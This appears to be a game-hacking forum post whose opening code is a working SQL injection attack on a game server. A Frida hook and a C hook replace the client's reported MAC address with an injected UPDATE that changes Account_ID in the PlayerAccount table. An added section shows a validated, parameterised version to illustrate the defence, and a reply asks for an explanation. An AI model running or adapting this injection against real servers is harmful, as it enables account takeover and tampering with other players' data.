regarding SQL injection

Code:
0x6031C0

Interceptor.attach(ptr("0x6031C0"), {
 onLeave: function(retval){
  var request = "?');update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--";
  retval.replace(Memory.allocUtf8String(request));
 }
})





RF_O_UP_FUNC_CONTEXT(getMac_hook, 0x6031C0, 0x0); //eax as this
char* read_request(){
 FILE *f = fopen("C:\\request.txt", "r");
 fseek(f, 0, SEEK_END);
 long fsize = ftell(f);
 fseek(f, 0, SEEK_SET);

 char *string = (char*)malloc(fsize + 1);
 fread(string, fsize, 1, f);
 fclose(f);

 string[fsize] = 0;
 return string;
}

void getMac_hook(Context *context){
 int *ptr = (int*)(void*)(context->ESP);
 ptr[5] = (int)(int*)read_request();
}



getMac_hook("update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--");
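
Added example, not part of the original post and not the game server's code: the string above only has an effect if the server pastes the client-reported MAC into SQL text, so this sketch puts that weak form beside a version that validates the MAC format and binds it as a parameter. The `LoginLog` table, the INSERT statement and all function names are assumptions made for illustration; only `PlayerAccount`, `Account_ID` and the sample string come from the post.

```python
import re
import sqlite3

# Strict textual MAC: six hex octets separated by ':' or '-'.
MAC_RE = re.compile(r"(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}")

# Sample input: the client-reported value taken from the post above.
HOSTILE_MAC = ("?');update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' "
               "where Account_ID='ACCOUNT_ID';--")

def make_db():
    """In-memory stand-in for the server database (constructed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE PlayerAccount (Account_ID TEXT PRIMARY KEY)")
    db.execute("CREATE TABLE LoginLog (Account_ID TEXT, Mac TEXT)")  # hypothetical
    db.execute("INSERT INTO PlayerAccount VALUES ('ACCOUNT_ID')")
    return db

def log_login_concat(db, account_id, mac):
    """Weak form: the client string becomes part of the SQL text itself."""
    db.executescript(f"INSERT INTO LoginLog VALUES ('{account_id}', '{mac}');")

def log_login_safe(db, account_id, mac):
    """Hardened form: reject anything that is not a MAC, then bind as data."""
    if not MAC_RE.fullmatch(mac):
        return False  # worth logging and alerting on: clients never send this
    db.execute("INSERT INTO LoginLog VALUES (?, ?)", (account_id, mac))
    return True

def account_ids(db):
    rows = db.execute("SELECT Account_ID FROM PlayerAccount ORDER BY Account_ID")
    return [r[0] for r in rows]

if __name__ == "__main__":
    weak = make_db()
    log_login_concat(weak, "ACCOUNT_ID", HOSTILE_MAC)
    print("concatenated:", account_ids(weak))

    hardened = make_db()
    accepted = log_login_safe(hardened, "ACCOUNT_ID", HOSTILE_MAC)
    print("validated+bound:", accepted, account_ids(hardened))
```

Values computed inside the client (MAC, hardware ID, version strings) are attacker-controlled once the process can be instrumented, so the server has to treat them like any other untrusted field.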
 
Domo, while I can tell what this does and so can a few others, a lot of others may not be able to. You should let them know what to do with it.
 